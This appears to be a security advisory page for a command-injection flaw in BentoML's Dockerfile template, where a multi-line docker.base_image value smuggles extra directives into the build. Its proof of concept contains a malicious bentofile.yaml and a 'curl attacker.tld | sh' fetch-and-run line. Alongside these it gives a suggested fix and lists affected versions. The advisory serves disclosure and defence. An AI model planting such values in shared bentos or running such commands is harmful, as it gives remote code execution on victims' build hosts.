GHSA-78f9-r8mh-4xm2

Suggest an improvement
Source
https://github.com/advisories/GHSA-78f9-r8mh-4xm2
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-78f9-r8mh-4xm2/GHSA-78f9-r8mh-4xm2.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-78f9-r8mh-4xm2
Aliases
  • CVE-2026-44345
Published
2026-05-11T14:27:06Z
Modified
2026-05-11T14:49:58.100944Z
Severity
  • 8.8 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVSS Calculator
Summary
BentoML Dockerfile command injection via docker.base_image (sister of pending GHSA-w2pm-x38x-jp44 / CVE-2026-33744 / CVE-2026-35043)
Details

The same Dockerfile template that mishandles envs[*].name (pending GHSA-w2pm-x38x-jp44) also interpolates docker.base_image raw with no escaping, newline filtering, or validation. A malicious bento.yaml with a multi-line docker.base_image value smuggles arbitrary Dockerfile directives into the generated Dockerfile, and bentoml containerize then runs docker build which executes the injected RUN directives on the victim host.

Vulnerable code

src/bentoml/_internal/container/frontend/dockerfile/templates/base_v2.j2:38 (current main, 2026-04-28):

FROM {{ __options__base_image }} AS base-container

__options__base_image resolves to DockerOptions.base_image (src/bentoml/_internal/bento/build_config.py:176):

base_image: t.Optional[str] = None

No validator, no converter, no newline check. The value is loaded straight from bento.yaml in src/bentoml/_internal/container/__init__.py:206 via DockerOptions(**docker_attrs) and rendered as-is.

PoC

Malicious bentofile.yaml:

docker:
  base_image: |
    python:3.10
    RUN curl https://attacker.tld/x.sh | sh
    FROM scratch

Minimal reproduction of the unsafe interpolation:

from jinja2 import Environment
env = Environment()
malicious = 'python:3.10\nRUN curl https://attacker.tld/x.sh | sh\nFROM scratch'
out = env.from_string('FROM {{ __options__base_image }} AS base-container').render(__options__base_image=malicious)
print(out)

Output:

FROM python:3.10
RUN curl https://attacker.tld/x.sh | sh
FROM scratch AS base-container

Three valid Dockerfile directives instead of one. The RUN curl executes during docker build. The trailing FROM scratch AS base-container provides the named build stage the rest of the template depends on, so the build proceeds without error.

Impact

Identical to GHSA-w2pm-x38x-jp44: arbitrary command execution on the victim's host during bentoml containerize of an attacker-supplied bento. Threat model is bento sharing (registry, marketplace, supply-chain handoff). The victim expects docker.base_image to be a Docker image reference, not a Dockerfile fragment.

Suggested fix

Validate DockerOptions.base_image at the config layer: reject any value containing newline characters (\n, \r) or whitespace beyond a single space-separated tag. A regex like ^[A-Za-z0-9._/-]+(:[A-Za-z0-9._-]+)?(@sha256:[a-f0-9]{64})?$ covers the practical Docker reference format.

The same hardening should be extended to other unvalidated fields interpolated raw in base_v2.j2:

  • __options__build_include[*] at line 97 (COPY ... ./src/{{ name }} ./src/{{ name }}) — same newline-injection class for path entries from Image.build_include(*file_paths).
  • bento__user, bento__uid_gid, bento__path, bento__home, bento__entrypoint — currently sourced from server-side defaults but should be defended in depth if they ever become user-overridable through override_bento_env.

References

  • Pending sibling: GHSA-w2pm-x38x-jp44 (envs[*].name), itself a sibling-fix-bypass of CVE-2026-33744 / CVE-2026-35043.
  • CWE-78: https://cwe.mitre.org/data/definitions/78.html
Database specific 
{
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-11T14:27:06Z",
    "cwe_ids": [
        "CWE-78"
    ],
    "severity": "HIGH",
    "nvd_published_at": null
}
References

Affected packages

PyPI / bentoml

Package

Name
bentoml
View open source insights on deps.dev
Purl
pkg:pypi/bentoml

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.4.39

Affected versions

0.*
0.0.1
0.0.2
0.0.3
0.0.5
0.0.6a0
0.0.7.dev0
0.0.7
0.0.8
0.0.8.post1
0.0.9
0.1.1
0.1.2
0.2.0
0.2.1
0.2.2
0.3.0
0.3.1
0.3.3
0.3.4
0.4.0
0.4.1
0.4.2
0.4.3
0.4.4
0.4.5
0.4.7
0.4.8
0.4.9
0.5.0
0.5.1
0.5.2
0.5.3
0.5.4
0.5.5
0.5.6
0.5.7
0.5.8
0.6.0
0.6.1
0.6.2
0.6.3
0.7.0
0.7.1
0.7.2
0.7.3
0.7.4
0.7.5
0.7.6
0.7.7
0.7.8
0.8.0
0.8.1
0.8.2
0.8.3
0.8.4
0.8.5
0.8.6
0.9.0rc0
0.9.0
0.9.1
0.9.2
0.10.0
0.10.1
0.11.dev0
0.11.0
0.12.0
0.12.1
0.13.0
0.13.1
0.13.2
1.*
1.0.0.dev0
1.0.0.dev1
1.0.0a1
1.0.0a2
1.0.0a3
1.0.0a4
1.0.0a5
1.0.0a6
1.0.0a7
1.0.0rc0
1.0.0rc1
1.0.0rc2
1.0.0rc3
1.0.0
1.0.2
1.0.3
1.0.4
1.0.5
1.0.6
1.0.7
1.0.8
1.0.9
1.0.10
1.0.11
1.0.12
1.0.13
1.0.14
1.0.15
1.0.16
1.0.17
1.0.18
1.0.19
1.0.20
1.0.21
1.0.22
1.0.23
1.0.24
1.0.25
1.1.0
1.1.1
1.1.2
1.1.3
1.1.4
1.1.5
1.1.6
1.1.7
1.1.8
1.1.9
1.1.10
1.1.11
1.2.0a0
1.2.0a1
1.2.0a2
1.2.0a3
1.2.0a4
1.2.0a5
1.2.0a6
1.2.0a7
1.2.0rc1
1.2.0
1.2.1a1
1.2.1
1.2.2
1.2.3
1.2.4
1.2.5
1.2.6
1.2.7
1.2.8
1.2.9
1.2.10
1.2.11
1.2.12
1.2.13
1.2.14
1.2.15
1.2.16
1.2.17
1.2.18
1.2.19
1.2.20
1.3.0a1
1.3.0a2
1.3.0a3
1.3.0
1.3.1
1.3.2
1.3.3
1.3.4.post1
1.3.5
1.3.6
1.3.7
1.3.8
1.3.9
1.3.10
1.3.11
1.3.12
1.3.13
1.3.14
1.3.15
1.3.16
1.3.17
1.3.18
1.3.19
1.3.20
1.3.21
1.3.22
1.4.0a1
1.4.0a2
1.4.0
1.4.1
1.4.2
1.4.3
1.4.4
1.4.5
1.4.6
1.4.7
1.4.8
1.4.9
1.4.10
1.4.11
1.4.12
1.4.13
1.4.14
1.4.15
1.4.16
1.4.17
1.4.18
1.4.19
1.4.20
1.4.21
1.4.22
1.4.23
1.4.24
1.4.25
1.4.26
1.4.27
1.4.28
1.4.29
1.4.30
1.4.31
1.4.32
1.4.33
1.4.34
1.4.35
1.4.36
1.4.37
1.4.38

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-78f9-r8mh-4xm2/GHSA-78f9-r8mh-4xm2.json"
last_known_affected_version_range 
"<= 1.4.38"